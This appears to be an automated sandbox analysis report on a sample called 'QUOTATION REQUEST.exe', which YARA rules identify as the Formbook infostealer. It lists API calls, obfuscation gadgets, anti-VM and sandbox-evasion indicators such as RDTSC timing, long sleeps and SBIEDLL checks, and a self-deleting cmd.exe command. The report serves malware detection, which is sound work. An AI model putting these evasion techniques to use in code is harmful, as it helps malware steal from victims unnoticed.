Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036396E0 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_036396E0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036396D0 NtCreateKey,LdrInitializeThunk, 9_2_036396D0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03639540 NtReadFile,LdrInitializeThunk, 9_2_03639540
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036395D0 NtClose,LdrInitializeThunk, 9_2_036395D0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03639B00 NtSetValueKey, 9_2_03639B00
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0363A3B0 NtGetContextThread, 9_2_0363A3B0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03639A20 NtResumeThread, 9_2_03639A20
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03639A00 NtProtectVirtualMemory, 9_2_03639A00
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03639A10 NtQuerySection, 9_2_03639A10
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03639A80 NtOpenDirectoryObject, 9_2_03639A80
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03639950 NtQueueApcThread, 9_2_03639950
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036399D0 NtCreateProcessEx, 9_2_036399D0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0363B040 NtSuspendThread, 9_2_0363B040
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03639820 NtEnumerateKey, 9_2_03639820
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036398F0 NtReadVirtualMemory, 9_2_036398F0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036398A0 NtWriteVirtualMemory, 9_2_036398A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03639760 NtOpenProcess, 9_2_03639760
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0363A770 NtOpenThread, 9_2_0363A770
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03639770 NtSetInformationFile, 9_2_03639770
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03639730 NtQueryVirtualMemory, 9_2_03639730
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0363A710 NtOpenProcessToken, 9_2_0363A710
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036397A0 NtUnmapViewOfSection, 9_2_036397A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03639670 NtQueryInformationProcess, 9_2_03639670
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03639610 NtEnumerateValueKey, 9_2_03639610
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03639560 NtWriteFile, 9_2_03639560
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03639520 NtWaitForSingleObject, 9_2_03639520
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0363AD30 NtSetContextThread, 9_2_0363AD30
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036395F0 NtQueryInformationFile, 9_2_036395F0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00EE81C0 NtCreateFile, 9_2_00EE81C0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00EE82F0 NtClose, 9_2_00EE82F0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00EE8270 NtReadFile, 9_2_00EE8270
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00EE83A0 NtAllocateVirtualMemory, 9_2_00EE83A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00EE82EF NtClose, 9_2_00EE82EF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00EE82BA NtReadFile, 9_2_00EE82BA
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00EE839F NtAllocateVirtualMemory, 9_2_00EE839F
Detected potential crypto function
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 0_2_00C194A8 0_2_00C194A8
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 0_2_00C1C3A0 0_2_00C1C3A0
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 0_2_00C1A758 0_2_00C1A758
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 0_2_04C1C900 0_2_04C1C900
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 3_2_0040102F 3_2_0040102F
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 3_2_00401030 3_2_00401030
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 3_2_00401209 3_2_00401209
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 3_2_0041CB85 3_2_0041CB85
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 3_2_00408C5D 3_2_00408C5D
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 3_2_00408C60 3_2_00408C60
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 3_2_0041B4A3 3_2_0041B4A3
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 3_2_0041B4A6 3_2_0041B4A6
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 3_2_0041BD74 3_2_0041BD74
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 3_2_0041C58C 3_2_0041C58C
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 3_2_00402D90 3_2_00402D90
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 3_2_0041CF94 3_2_0041CF94
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 3_2_00402FB0 3_2_00402FB0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036C2B28 9_2_036C2B28
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036B03DA 9_2_036B03DA
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036BDBD2 9_2_036BDBD2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0362EBB0 9_2_0362EBB0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036AFA2B 9_2_036AFA2B
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036C22AE 9_2_036C22AE
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03614120 9_2_03614120
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035FF900 9_2_035FF900
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036CE824 9_2_036CE824
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036B1002 9_2_036B1002
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036C28EC 9_2_036C28EC
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036220A0 9_2_036220A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036C20A8 9_2_036C20A8
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0360B090 9_2_0360B090
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036C1FF1 9_2_036C1FF1
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036CDFCE 9_2_036CDFCE
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03616E30 9_2_03616E30
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036BD616 9_2_036BD616
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036C2EF7 9_2_036C2EF7
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036C1D55 9_2_036C1D55
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036C2D07 9_2_036C2D07
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_035F0D20 9_2_035F0D20
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0360D5E0 9_2_0360D5E0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036C25DD 9_2_036C25DD
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_03622581 9_2_03622581
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_036BD466 9_2_036BD466
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0360841F 9_2_0360841F
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00EECB85 9_2_00EECB85
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00EEB4A6 9_2_00EEB4A6
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00EEB4A3 9_2_00EEB4A3
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00ED8C60 9_2_00ED8C60
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00ED8C5D 9_2_00ED8C5D
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00EEC58C 9_2_00EEC58C
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00ED2D90 9_2_00ED2D90
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00EEBD74 9_2_00EEBD74
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00ED2FB0 9_2_00ED2FB0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00EECF94 9_2_00EECF94
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\wlanext.exe Code function: String function: 035FB150 appears 45 times
Sample file is different than original file name gathered from version info
Source: QUOTATION REQUEST.exe, 00000000.00000002.233827964.00000000059E0000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameDSASignature.dll@ vs QUOTATION REQUEST.exe
Source: QUOTATION REQUEST.exe, 00000000.00000002.227364139.00000000002E8000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameNameCache.exe6 vs QUOTATION REQUEST.exe
Source: QUOTATION REQUEST.exe, 00000000.00000002.228172147.0000000002631000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameSimpleUI.dll( vs QUOTATION REQUEST.exe
Source: QUOTATION REQUEST.exe, 00000003.00000002.269387734.000000000180F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs QUOTATION REQUEST.exe
Source: QUOTATION REQUEST.exe, 00000003.00000000.224914371.0000000000CF8000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameNameCache.exe6 vs QUOTATION REQUEST.exe
Source: QUOTATION REQUEST.exe, 00000003.00000002.269766089.0000000001A52000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamewlanext.exej% vs QUOTATION REQUEST.exe
Source: QUOTATION REQUEST.exe Binary or memory string: OriginalFilenameNameCache.exe6 vs QUOTATION REQUEST.exe
Uses 32bit PE files
Source: QUOTATION REQUEST.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.269105881.0000000001260000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.481398229.0000000000ED0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.229469085.0000000003639000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.483772620.00000000033B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.483689889.0000000003380000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.269223785.00000000016B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.268768212.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.QUOTATION REQUEST.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.QUOTATION REQUEST.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.QUOTATION REQUEST.exe.36d2a18.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: QUOTATION REQUEST.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/1@15/6
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\QUOTATION REQUEST.exe.log
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5564:120:WilError_01
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
Source: QUOTATION REQUEST.exe Virustotal: Detection: 18%
Source: QUOTATION REQUEST.exe ReversingLabs: Detection: 34%
Source: unknown Process created: C:\Users\user\Desktop\QUOTATION REQUEST.exe 'C:\Users\user\Desktop\QUOTATION REQUEST.exe'
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Process created: C:\Users\user\Desktop\QUOTATION REQUEST.exe C:\Users\user\Desktop\QUOTATION REQUEST.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
Source: C:\Windows\SysWOW64\wlanext.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\QUOTATION REQUEST.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Process created: C:\Users\user\Desktop\QUOTATION REQUEST.exe C:\Users\user\Desktop\QUOTATION REQUEST.exe
Source: C:\Windows\SysWOW64\wlanext.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\QUOTATION REQUEST.exe'
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: QUOTATION REQUEST.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: QUOTATION REQUEST.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wntdll.pdbUGP source: QUOTATION REQUEST.exe, 00000003.00000002.269387734.000000000180F000.00000040.00000001.sdmp, wlanext.exe, 00000009.00000002.484208214.00000000035D0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: QUOTATION REQUEST.exe, 00000003.00000002.269387734.000000000180F000.00000040.00000001.sdmp, wlanext.exe
Source: Binary string: wlanext.pdb source: QUOTATION REQUEST.exe, 00000003.00000002.269730717.0000000001A40000.00000040.00000001.sdmp
Source: Binary string: wlanext.pdbGCTL source: QUOTATION REQUEST.exe, 00000003.00000002.269730717.0000000001A40000.00000040.00000001.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 0_2_002394E5 push cs; iretd 0_2_002394E6
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 3_2_0041C93F pushad ; ret 3_2_0041C943
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 3_2_0041C9F4 push 1B579E0Eh; ret 3_2_0041CA15
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 3_2_00415249 push ebx; iretd 3_2_0041524C
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 3_2_004152D2 push 59027665h; retf 3_2_004152E2
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 3_2_00413348 push ds; iretd 3_2_00413349
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 3_2_0041B3B5 push eax; ret 3_2_0041B408
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 3_2_0040D441 push EB161335h; ret 3_2_0040D446
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 3_2_0041B46C push eax; ret 3_2_0041B472
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 3_2_0041B402 push eax; ret 3_2_0041B408
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 3_2_0041B40B push eax; ret 3_2_0041B472
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 3_2_0041B499 push eax; ret 3_2_0041B472
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 3_2_00C494E5 push cs; iretd 3_2_00C494E6
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_0364D0D1 push ecx; ret 9_2_0364D0E4
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00EEC9F4 push 1B579E0Eh; ret 9_2_00EECA15
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00EEC93F pushad ; ret 9_2_00EEC943
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00EE52D2 push 59027665h; retf 9_2_00EE52E2
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00EE5249 push ebx; iretd 9_2_00EE524C
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00EEB3B5 push eax; ret 9_2_00EEB408
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00EE3348 push ds; iretd 9_2_00EE3349
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00EEB499 push eax; ret 9_2_00EEB472
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00EEB46C push eax; ret 9_2_00EEB472
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00EDD441 push EB161335h; ret 9_2_00EDD446
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00EEB40B push eax; ret 9_2_00EEB472
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 9_2_00EEB402 push eax; ret 9_2_00EEB408
Source: initial sample Static PE information: section name: .text entropy: 7.93143837904
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wlanext.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: QUOTATION REQUEST.exe PID: 4660, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: QUOTATION REQUEST.exe, 00000000.00000002.228270852.0000000002685000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe RDTSC instruction interceptor: First address: 0000000000ED85E4 second address: 0000000000ED85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wlanext.exe RDTSC instruction interceptor: First address: 0000000000ED897E second address: 0000000000ED8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Code function: 3_2_004088B0 rdtsc 3_2_004088B0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Thread delayed: delay time: 922337203685477
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe TID: 5296 Thread sleep time: -103583s >= -30000s
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe TID: 3440 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 4156 Thread sleep time: -70000s >= -30000s
Source: C:\Windows\SysWOW64\wlanext.exe TID: 4644 Thread sleep time: -52000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\wlanext.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Thread delayed: delay time: 103583
Source: C:\Users\user\Desktop\QUOTATION REQUEST.exe Thread delayed: delay time: 922337203685477
Source: explorer.exe, 00000005.00000000.249792104.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000005.00000000.249792104.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
